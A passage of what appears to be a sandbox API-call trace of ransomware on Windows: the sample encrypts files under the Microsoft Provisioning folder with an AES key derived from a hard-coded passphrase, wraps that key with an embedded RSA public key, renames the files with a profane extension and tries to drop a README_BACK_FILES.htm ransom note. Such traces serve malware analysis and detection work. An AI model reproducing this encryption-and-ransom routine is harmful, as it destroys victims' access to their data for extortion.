Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0240.127] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0240.127] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0240.128] CryptDestroyHash (hHash=0x28e86f8) returned 1 [0240.128] CryptDestroyKey (hKey=0x28e88b8) returned 1 [0240.128] CryptReleaseContext (hProv=0x28d3f90, dwFlags=0x0) returned 1 [0240.128] FindNextFileA (in: hFindFile=0x28e89f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0240.128] FindClose (in: hFindFile=0x28e89f8 | out: hFindFile=0x28e89f8) returned 1 [0240.128] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0240.128] AreFileApisANSI () returned 1 [0240.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28d4d60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0240.128] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.129] GetLastError () returned 0x5 [0240.129] GetLastError () returned 0x5 [0240.129] FindNextFileA (in: hFindFile=0x28e89b8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.129] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.129] GetLastError () returned 0x5 [0240.129] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml")) returned 0x20 [0240.129] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0240.130] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.130] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.130] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.131] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d4d60) returned 1 [0240.133] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.133] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.133] CryptHashData (hHash=0x28e84b8, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.133] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e84b8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e8378) returned 1 [0240.133] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.133] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.133] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d3c60) returned 1 [0240.134] CryptImportPublicKeyInfo (in: hCryptProv=0x28d3c60, dwCertEncodingType=0x1, pInfo=0x28c7858*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7888*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7890*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e8a38) returned 1 [0240.134] CryptEncrypt (in: hKey=0x28e8a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.134] CryptEncrypt (in: hKey=0x28e8a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3ce8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d3ce8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.134] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d3ce8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.134] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.134] CryptEncrypt (in: hKey=0x28e8378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.134] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.134] CloseHandle (hObject=0xffffffff) returned 1 [0240.134] CloseHandle (hObject=0xffffffff) returned 1 [0240.135] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0240.135] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0240.135] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml.gsg")) returned 0 [0240.136] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\runtime.xml.fuck")) returned 0 [0240.137] CryptDestroyHash (hHash=0x28e84b8) returned 1 [0240.137] CryptDestroyKey (hKey=0x28e8378) returned 1 [0240.137] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.137] FindNextFileA (in: hFindFile=0x28e89b8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.137] FindClose (in: hFindFile=0x28e89b8 | out: hFindFile=0x28e89b8) returned 1 [0240.137] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\readme_back_files.htm")) returned 0xffffffff [0240.137] AreFileApisANSI () returned 1 [0240.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0240.137] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.138] GetLastError () returned 0x5 [0240.138] GetLastError () returned 0x5 [0240.138] FindNextFileA (in: hFindFile=0x28e87b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.138] FindClose (in: hFindFile=0x28e87b8 | out: hFindFile=0x28e87b8) returned 1 [0240.138] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\readme_back_files.htm")) returned 0xffffffff [0240.138] AreFileApisANSI () returned 1 [0240.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0240.138] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.139] GetLastError () returned 0x5 [0240.139] GetLastError () returned 0x5 [0240.139] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.139] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e88b8 [0240.140] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.140] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.140] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.140] GetLastError () returned 0x5 [0240.141] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml")) returned 0x20 [0240.148] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0240.149] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.149] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.149] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.150] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.152] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.152] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.152] CryptHashData (hHash=0x28e86b8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.152] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e86b8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e8338) returned 1 [0240.152] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.152] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.152] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d4678) returned 1 [0240.153] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4678, dwCertEncodingType=0x1, pInfo=0x28c7518*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7548*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7550*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e8378) returned 1 [0240.153] CryptEncrypt (in: hKey=0x28e8378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.153] CryptEncrypt (in: hKey=0x28e8378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3e80*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d3e80*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.153] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d3e80, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.153] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.153] CryptEncrypt (in: hKey=0x28e8338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.153] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.153] CloseHandle (hObject=0xffffffff) returned 1 [0240.153] CloseHandle (hObject=0xffffffff) returned 1 [0240.153] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"), bFailIfExists=0) returned 0 [0240.154] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0240.154] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.gsg")) returned 0 [0240.154] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml.fuck")) returned 0 [0240.155] CryptDestroyHash (hHash=0x28e86b8) returned 1 [0240.155] CryptDestroyKey (hKey=0x28e8338) returned 1 [0240.155] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.155] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.155] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.155] GetLastError () returned 0x5 [0240.155] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml")) returned 0x20 [0240.155] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0240.156] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.156] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.156] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.157] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.158] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.158] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.158] CryptHashData (hHash=0x28e8478, pbData=0x27e2448, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.158] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e8478, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e84f8) returned 1 [0240.159] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.159] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.159] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d3f90) returned 1 [0240.159] CryptImportPublicKeyInfo (in: hCryptProv=0x28d3f90, dwCertEncodingType=0x1, pInfo=0x28c7d38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7d68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7d70*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e8938) returned 1 [0240.159] CryptEncrypt (in: hKey=0x28e8938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.159] CryptEncrypt (in: hKey=0x28e8938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d4700*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d4700*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.159] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d4700, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.159] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.159] CryptEncrypt (in: hKey=0x28e84f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.159] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.159] CloseHandle (hObject=0xffffffff) returned 1 